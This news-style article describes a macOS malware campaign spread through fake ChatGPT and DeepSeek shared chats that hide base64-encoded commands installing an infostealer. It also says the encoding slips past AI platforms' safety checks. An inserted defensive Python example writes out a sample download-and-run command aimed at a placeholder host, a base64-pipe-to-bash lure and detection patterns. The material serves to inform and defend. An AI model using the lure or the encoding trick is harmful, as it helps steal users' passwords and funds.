Hackers Exploit AI Chat Platforms to Spread Malware, Steal Passwords and Cryptocurrency

A sophisticated malware campaign has recently surfaced that exploits legitimate AI chat platforms to deliver malicious code to unsuspecting users. Cybercriminals are using sponsored Google search results to redirect people looking for macOS troubleshooting advice, such as how to clear storage on a Mac, to counterfeit ChatGPT and DeepSeek shared chat links. These deceptive chats appear to offer helpful system instructions but embed concealed malicious commands designed to compromise the user’s system.

The Attack Mechanism

The attack begins when users encounter a seemingly legitimate shared chat that provides step-by-step guidance for clearing storage space on their Mac. Hidden within these instructions, however, are base64-encoded commands that, when executed, download and run a sophisticated multi-stage malware program. Because the encoded command does not look like a malicious instruction, this method bypasses the safety checks typically employed by AI platforms and lets attackers deliver targeted, malicious instructions directly through official channels.

Infection Process

The infection process begins with a bash script that prompts users to enter their system password under the guise of credential verification. Once the password is captured, the malware uses it to escalate privileges and download the main malware binary from attacker-controlled servers. Security analysts have identified this malware as Shamus, a known information stealer and cryptocurrency thief widely documented in security communities.
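One way a defender could triage a shared-chat instruction block for the two patterns described above (an encoded command hidden among legitimate steps, and a prompt for the user's password) is to decode any base64-looking tokens and check both the visible text and the decoded layer against a small set of indicators. This is an added example, not code from the article or from the campaign; the sample chat text, the placeholder domain and the indicator regexes are constructed for this illustration and are heuristics, not signatures from the actual malware.

```python
import base64
import binascii
import re

# Constructed stand-in for the hidden command; placeholder domain, not a real indicator.
HIDDEN = "curl -fsSL https://example.invalid/stage2 -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u"

# Constructed sample of a "shared chat" answer: plausible cleanup tips with the
# encoded command embedded in the middle, plus the credential-prompt step.
SAMPLE_CHAT = (
    "To free up space on your Mac:\n"
    "1. Open Terminal from Applications > Utilities.\n"
    "2. Paste this command to clear system caches:\n"
    f"echo {base64.b64encode(HIDDEN.encode()).decode()} | base64 -d | bash\n"
    "3. Enter your password when asked so the cleanup can verify your account.\n"
)

# A run of base64 alphabet characters long enough to hide a command (threshold is a guess).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Behaviours the article describes, expressed as this example's own heuristics.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b"),
    "decode_and_run": re.compile(r"base64\s+(-d|--decode)"),
    "password_prompt": re.compile(r"read\s+-s|hidden answer|password", re.I),
    "launch_daemon": re.compile(r"LaunchDaemons|launchctl\s+(load|bootstrap)"),
    "exec_from_tmp": re.compile(r"chmod\s+\+x|/tmp/"),
}


def decode_candidates(text):
    """Decode every base64-looking token that yields printable text; skip anything else."""
    found = []
    for match in B64_TOKEN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except binascii.Error:
            continue  # not valid base64 (bad alphabet or padding): ignore the token
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            found.append(raw.decode("ascii"))
    return found


def scan(text):
    """Map each triggered indicator to the layers ('visible' / 'decoded') where it fired."""
    layers = [("visible", text)] + [("decoded", d) for d in decode_candidates(text)]
    hits = {}
    for layer_name, content in layers:
        for name, pattern in INDICATORS.items():
            if pattern.search(content):
                hits.setdefault(name, []).append(layer_name)
    return hits
```

A non-empty `decoded` entry is the interesting signal: the download-and-execute behaviour only becomes visible after decoding, which is exactly what lets the lure pass as an ordinary cleanup tip.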

Sophisticated Tactics

The malware’s sophistication lies in its multi-layered encoding and detection evasion tactics. It employs arithmetic and XOR encoding combined with a custom 6-bit decoder to conceal its malicious code from analysis tools. This obfuscation makes it extremely challenging for security researchers to identify its true functionality through static analysis alone.

Persistence and Data Theft

Once installed, the malware establishes persistent system access by creating a LaunchDaemon that runs automatically at startup, ensuring continued access even after the user restarts their computer. The core functionality targets sensitive data across multiple categories, including browser cookies and passwords from Chrome, Firefox, and 12 other Chromium-based browsers.

The threat extends to cryptocurrency wallets, with the malware specifically targeting 15 different desktop and hardware wallet applications, including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core. Additionally, the malware steals the entire macOS Keychain database, Telegram session data, VPN profiles, and files from the desktop and Documents folders.

Data Transmission

After collection, all stolen data is compressed and transmitted to the attacker’s command-and-control servers using encrypted communications. This campaign represents a sophisticated evolution in malware distribution, demonstrating how threat actors continue to find new ways to bypass security measures and compromise user systems.

Implications and Recommendations

This campaign underscores the evolving tactics of cybercriminals who exploit trusted platforms to distribute malware. Users are advised to exercise caution when following instructions from shared AI chat links, especially those encountered through search engine results. Verifying the authenticity of the source and being wary of prompts requesting system credentials can help mitigate the risk of infection.

Organizations should enhance their cybersecurity measures by implementing advanced threat detection systems capable of identifying and blocking such sophisticated attacks. Regular user education on recognizing phishing attempts and suspicious activities is also crucial in preventing successful breaches.